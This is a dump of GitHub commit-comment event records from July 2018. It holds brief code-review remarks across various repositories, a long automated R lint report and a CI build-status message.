{"id":"8036614544","type":"CommitCommentEvent","actor":{"login":"agilewarealok"},"repo":{"name":"agileware/au.com.agileware.ewayrecurring"},"payload":{"comment":{"id":29884120,"position":4,"line":76,"path":"au_com_agileware_ewayrecurring.class.php","commit_id":"c371709b847bc39ddf371e2031c4029ace941448","created_at":"2018-07-30T09:42:46Z","updated_at":"2018-07-30T09:42:46Z","author_association":"CONTRIBUTOR","body":"These are not library files, first one is base class for Payment processor and second one is include file of the eWAY processor. We still both. We've removed library files on https://github.com/agileware/au.com.agileware.ewayrecurring/commit/c371709b847bc39ddf371e2031c4029ace941448#diff-be690c9b66ca70f77e7f1e834f66f592L77 & https://github.com/agileware/au.com.agileware.ewayrecurring/commit/c371709b847bc39ddf371e2031c4029ace941448#diff-be690c9b66ca70f77e7f1e834f66f592L78"}},"created_at":"2018-07-30T09:42:46Z"}
{"id":"8036614863","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29884122,"position":null,"line":null,"path":null,"commit_id":"6337b055c9929f1be7729662630f589164d4da8c","created_at":"2018-07-30T09:42:50Z","updated_at":"2018-07-30T09:42:50Z","author_association":"MEMBER","body":"Oh good. I was going to say something about that."}},"created_at":"2018-07-30T09:42:50Z"}
{"id":"8036618203","type":"CommitCommentEvent","actor":{"login":"18742519086"},"repo":{"name":"jlord/patchwork"},"payload":{"comment":{"id":29884134,"position":null,"line":null,"path":null,"commit_id":"37d7be715c7b378e568fd5844b23700716fceb99","created_at":"2018-07-30T09:43:31Z","updated_at":"2018-07-30T09:43:31Z","author_association":"NONE","body":"hh"}},"created_at":"2018-07-30T09:43:31Z"}
{"id":"8036619314","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"qi777xj/cpuminer"},"payload":{"comment":{"id":29884136,"position":null,"line":null,"path":null,"commit_id":"dbc77126e60472adadc91ff5796f9a0cfe159b06","created_at":"2018-07-30T09:43:44Z","updated_at":"2018-07-30T09:43:44Z","author_association":"NONE","body":"이게 맞는방법인지 확신이안서는데 찾아보면 워크어라운드라고 나오고 "}},"created_at":"2018-07-30T09:43:44Z"}
{"id":"8036620682","type":"CommitCommentEvent","actor":{"login":"18742519086"},"repo":{"name":"jlord/patchwork"},"payload":{"comment":{"id":29884140,"position":null,"line":null,"path":null,"commit_id":"37d7be715c7b378e568fd5844b23700716fceb99","created_at":"2018-07-30T09:44:00Z","updated_at":"2018-07-30T09:44:00Z","author_association":"NONE","body":"ddd\r\n"}},"created_at":"2018-07-30T09:44:00Z"}
{"id":"8036622187","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"MathieuDuponchelle/gst-python"},"payload":{"comment":{"id":29884143,"position":87,"line":87,"path":"examples/plugins/python/mixer.py","commit_id":"6cf081fa115d016f18904829039fbb7c24804ae8","created_at":"2018-07-30T09:44:17Z","updated_at":"2018-07-30T09:44:17Z","author_association":"CONTRIBUTOR","body":"This could do some kind of running-time based synchronization :)"}},"created_at":"2018-07-30T09:44:17Z"}
{"id":"8036626644","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29884154,"position":1,"line":1,"path":"app/design/frontend/IdealCode/DeepFish/Magento_Search/web/template/form.html","commit_id":"0fde2002057fbd5e88782042a987f471e2e0f3a6","created_at":"2018-07-30T09:45:10Z","updated_at":"2018-07-30T09:45:10Z","author_association":"OWNER","body":"Check max line length in whole file"}},"created_at":"2018-07-30T09:45:10Z"}
{"id":"8036627756","type":"CommitCommentEvent","actor":{"login":"MFreidank"},"repo":{"name":"MNegassi/dotfiles"},"payload":{"comment":{"id":29884159,"position":null,"line":null,"path":null,"commit_id":"6380f505ce5cd725a0bc7b50dcd3a225797862bb","created_at":"2018-07-30T09:45:22Z","updated_at":"2018-07-30T09:45:22Z","author_association":"NONE","body":"This will actually make the code fail in some cases.. The `*_` ensures that *all* arguments up to the last one are ignored. Did you have an issue with this? If so, I assume it is probably a python version problem. What python interpreter version did you use? "}},"created_at":"2018-07-30T09:45:22Z"}
{"id":"8036630593","type":"CommitCommentEvent","actor":{"login":"EvilDonaldJTrump"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29884166,"position":null,"line":null,"path":null,"commit_id":"8e3043819ebd1696343f7067cebd1e14a6ff74a6","created_at":"2018-07-30T09:45:54Z","updated_at":"2018-07-30T09:45:54Z","author_association":"NONE","body":"Your Fired"}},"created_at":"2018-07-30T09:45:54Z"}
{"id":"8036635404","type":"CommitCommentEvent","actor":{"login":"daserzw"},"repo":{"name":"daserzw/oidc-edu-wg"},"payload":{"comment":{"id":29884173,"position":13,"line":26,"path":"charter.md","commit_id":"04846d0de5756cd22341141de58484c2553a99fa","created_at":"2018-07-30T09:46:48Z","updated_at":"2018-07-30T09:46:48Z","author_association":"OWNER","body":"Yes, thanks for noticing! Solved in the next commit."}},"created_at":"2018-07-30T09:46:48Z"}
{"id":"8036639060","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"qi777xj/cpuminer"},"payload":{"comment":{"id":29884178,"position":null,"line":null,"path":null,"commit_id":"11c648e3873c4ab10df4f5da44c0f790aa558192","created_at":"2018-07-30T09:47:29Z","updated_at":"2018-07-30T09:47:29Z","author_association":"NONE","body":"이건왜?"}},"created_at":"2018-07-30T09:47:29Z"}
{"id":"8036642113","type":"CommitCommentEvent","actor":{"login":"Araq"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":29884183,"position":5,"line":127,"path":"lib/pure/asyncdispatch.nim","commit_id":"202cc489034f6e4f41140d7af82e93b112fcd3dd","created_at":"2018-07-30T09:48:05Z","updated_at":"2018-07-30T09:48:05Z","author_association":"MEMBER","body":"Yes! My next push will include a fix for that."}},"created_at":"2018-07-30T09:48:05Z"}
{"id":"8036643145","type":"CommitCommentEvent","actor":{"login":"JordyMoos"},"repo":{"name":"jlengrand/elm-dungeon"},"payload":{"comment":{"id":29884192,"position":null,"line":null,"path":null,"commit_id":"8bc065a539570381bbb4c605f76deff1dc8488bc","created_at":"2018-07-30T09:48:17Z","updated_at":"2018-07-30T09:48:17Z","author_association":"NONE","body":"You can use `List.any` for this:\r\nhttp://package.elm-lang.org/packages/elm-lang/core/5.1.1/List#any\r\n\r\nTheoretically the implementation of `List.any` does not need to iterate over all values in the list. If he finds a value that returns true with the predicate then he can return early. Which makes the function more performing . Also `List.any` states more clearly what you want then a `List.filter |> List.isEmpty |> not`"}},"created_at":"2018-07-30T09:48:17Z"}
{"id":"8036646420","type":"CommitCommentEvent","actor":{"login":"Srushtika"},"repo":{"name":"ably/docs"},"payload":{"comment":{"id":29884198,"position":null,"line":null,"path":null,"commit_id":"c745e5f78765b9fa7498bb7944716e916550c944","created_at":"2018-07-30T09:48:57Z","updated_at":"2018-07-30T09:48:57Z","author_association":"MEMBER","body":"Relative to https://github.com/ably/tutorials/issues/46"}},"created_at":"2018-07-30T09:48:57Z"}
{"id":"8036646818","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29884200,"position":null,"line":null,"path":null,"commit_id":"ea90a4a2e42167f13463ce94c3a8c7bc220f01df","created_at":"2018-07-30T09:49:02Z","updated_at":"2018-07-30T09:49:02Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:119:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/invoercontroleData_soortenKenmerken.R#L119) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:63:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/invoercontroleData_voorwaarden.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:64:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/invoercontroleData_voorwaarden.R#L64) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:475:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_1_databank.R#L475) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:476:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_1_databank.R#L476) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:555:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_berekenLSVIbasis.R#L555) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:556:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_berekenLSVIbasis.R#L556) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:21:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L21) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  mutate(  #idee is om onderstaande code te wissen zodra de databank/rekenmodule hiervoor aangepast is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:55:3:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L55) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:56:3:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L56) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/ea90a4a2e42167f13463ce94c3a8c7bc220f01df/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-30T09:49:02Z"}
{"id":"8036653262","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29884202,"position":19,"line":19,"path":"app/design/frontend/IdealCode/DeepFish/Magento_Search/web/js/form.js","commit_id":"0fde2002057fbd5e88782042a987f471e2e0f3a6","created_at":"2018-07-30T09:50:18Z","updated_at":"2018-07-30T09:50:18Z","author_association":"OWNER","body":"Need to create via observe variable"}},"created_at":"2018-07-30T09:50:18Z"}
{"id":"8036656296","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29884208,"position":15,"line":15,"path":"app/design/frontend/IdealCode/DeepFish/Magento_Search/web/js/form.js","commit_id":"0fde2002057fbd5e88782042a987f471e2e0f3a6","created_at":"2018-07-30T09:50:54Z","updated_at":"2018-07-30T09:50:54Z","author_association":"OWNER","body":"Where description of method?"}},"created_at":"2018-07-30T09:50:54Z"}
{"id":"8036656482","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29884209,"position":null,"line":null,"path":null,"commit_id":"14499fab2eb9ca13cf5bbfad721f6b0f8d654686","created_at":"2018-07-30T09:50:56Z","updated_at":"2018-07-30T09:50:56Z","author_association":"COLLABORATOR","body":"-> #100 "}},"created_at":"2018-07-30T09:50:56Z"}
{"id":"8036657728","type":"CommitCommentEvent","actor":{"login":"MDMQH"},"repo":{"name":"MDMQH/MDM"},"payload":{"comment":{"id":29884215,"position":6,"line":6,"path":"MDM/src/main/java/TestClassForGITTEst.java","commit_id":"00076ed5eaa36e0c5ac41dbf21cd5d99529d253e","created_at":"2018-07-30T09:51:11Z","updated_at":"2018-07-30T09:51:11Z","author_association":"OWNER","body":"hello commit"}},"created_at":"2018-07-30T09:51:11Z"}
{"id":"8036658548","type":"CommitCommentEvent","actor":{"login":"Nezune"},"repo":{"name":"Galarzaa90/NabBot"},"payload":{"comment":{"id":29884217,"position":null,"line":null,"path":null,"commit_id":"b0b184aa38096ea91d955ced62e09a8f1fc95d92","created_at":"2018-07-30T09:51:21Z","updated_at":"2018-07-30T09:51:21Z","author_association":"COLLABORATOR","body":"you deserve it"}},"created_at":"2018-07-30T09:51:21Z"}
{"id":"8036668460","type":"CommitCommentEvent","actor":{"login":"vashli"},"repo":{"name":"vashli/os_final"},"payload":{"comment":{"id":29884242,"position":null,"line":null,"path":null,"commit_id":"966b3c31e93561d6f564f8d8e39d556cb6c0e7ad","created_at":"2018-07-30T09:53:15Z","updated_at":"2018-07-30T09:53:15Z","author_association":"OWNER","body":"didi filebis kitxvase kvdeba. uzarmazar chunks gzavnis serveri da fusema arao"}},"created_at":"2018-07-30T09:53:15Z"}
{"id":"8036672535","type":"CommitCommentEvent","actor":{"login":"Onikiro"},"repo":{"name":"Onikiro/VKLikeParser"},"payload":{"comment":{"id":29884251,"position":16,"line":16,"path":"VkLikesParserMVC/Models/Parser.cs","commit_id":"5cf0884d826579f36cc559fbf5d7aefe6cf2a007","created_at":"2018-07-30T09:54:02Z","updated_at":"2018-07-30T09:54:02Z","author_association":"OWNER","body":"GetLikes to GetLikesSegment"}},"created_at":"2018-07-30T09:54:02Z"}
{"id":"8036678349","type":"CommitCommentEvent","actor":{"login":"Onikiro"},"repo":{"name":"Onikiro/VKLikeParser"},"payload":{"comment":{"id":29884258,"position":48,"line":48,"path":"VkLikesParserMVC/Models/Parser.cs","commit_id":"5cf0884d826579f36cc559fbf5d7aefe6cf2a007","created_at":"2018-07-30T09:55:09Z","updated_at":"2018-07-30T09:55:09Z","author_association":"OWNER","body":"SaveLikes to GetLikes;\r\nvoid to List<long>\r\nreturn all ids list"}},"created_at":"2018-07-30T09:55:09Z"}
{"id":"8036682876","type":"CommitCommentEvent","actor":{"login":"Onikiro"},"repo":{"name":"Onikiro/VKLikeParser"},"payload":{"comment":{"id":29884264,"position":22,"line":22,"path":"VkLikesParserMVC/Models/VkSystem.cs","commit_id":"5cf0884d826579f36cc559fbf5d7aefe6cf2a007","created_at":"2018-07-30T09:56:02Z","updated_at":"2018-07-30T09:56:02Z","author_association":"OWNER","body":"improve singleton"}},"created_at":"2018-07-30T09:56:02Z"}
{"id":"8036683093","type":"CommitCommentEvent","actor":{"login":"tdmalone"},"repo":{"name":"terraform-providers/terraform-provider-pagerduty"},"payload":{"comment":{"id":29884265,"position":null,"line":null,"path":null,"commit_id":"c7da130366133bec20917e08d53f2d64cf532acd","created_at":"2018-07-30T09:56:05Z","updated_at":"2018-07-30T09:56:05Z","author_association":"NONE","body":"Just went looking through the codebase to find this because it wasn't documented on the site. Was about to edit it in then realised it's already been done! 😛 Just thought I'd point out that this hasn't been deployed yet. Cheers!"}},"created_at":"2018-07-30T09:56:05Z"}
{"id":"8036689700","type":"CommitCommentEvent","actor":{"login":"1679araujo"},"repo":{"name":"validator/validator"},"payload":{"comment":{"id":29884278,"position":null,"line":null,"path":null,"commit_id":"0defd77f070523a7c98b5ca267a5b59f2751311e","created_at":"2018-07-30T09:57:19Z","updated_at":"2018-07-30T09:57:19Z","author_association":"NONE","body":"Cumpliments...."}},"created_at":"2018-07-30T09:57:19Z"}
{"id":"8036693866","type":"CommitCommentEvent","actor":{"login":"CAdloff"},"repo":{"name":"CAdloff/genproductions"},"payload":{"comment":{"id":29884282,"position":null,"line":null,"path":null,"commit_id":"462c65cd904b8063e5eacd8dfb2c8cc6a0532f39","created_at":"2018-07-30T09:58:05Z","updated_at":"2018-07-30T09:58:05Z","author_association":"OWNER","body":"add tH_b OK"}},"created_at":"2018-07-30T09:58:05Z"}
{"id":"8036700597","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29884292,"position":61,"line":111,"path":"app/design/frontend/IdealCode/DeepFish/Magento_Search/web/css/source/_module.less","commit_id":"0fde2002057fbd5e88782042a987f471e2e0f3a6","created_at":"2018-07-30T09:59:24Z","updated_at":"2018-07-30T09:59:24Z","author_association":"OWNER","body":"Can we miss this class?"}},"created_at":"2018-07-30T09:59:24Z"}
{"id":"8040955711","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29895857,"position":null,"line":null,"path":null,"commit_id":"2c43d0b852bf1e81e092fb674ad6a6188ee0afb4","created_at":"2018-07-31T00:02:41Z","updated_at":"2018-07-31T00:02:41Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2956 of 2956 tests passed, 1 test warnings)\n\nMessages:\n\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> 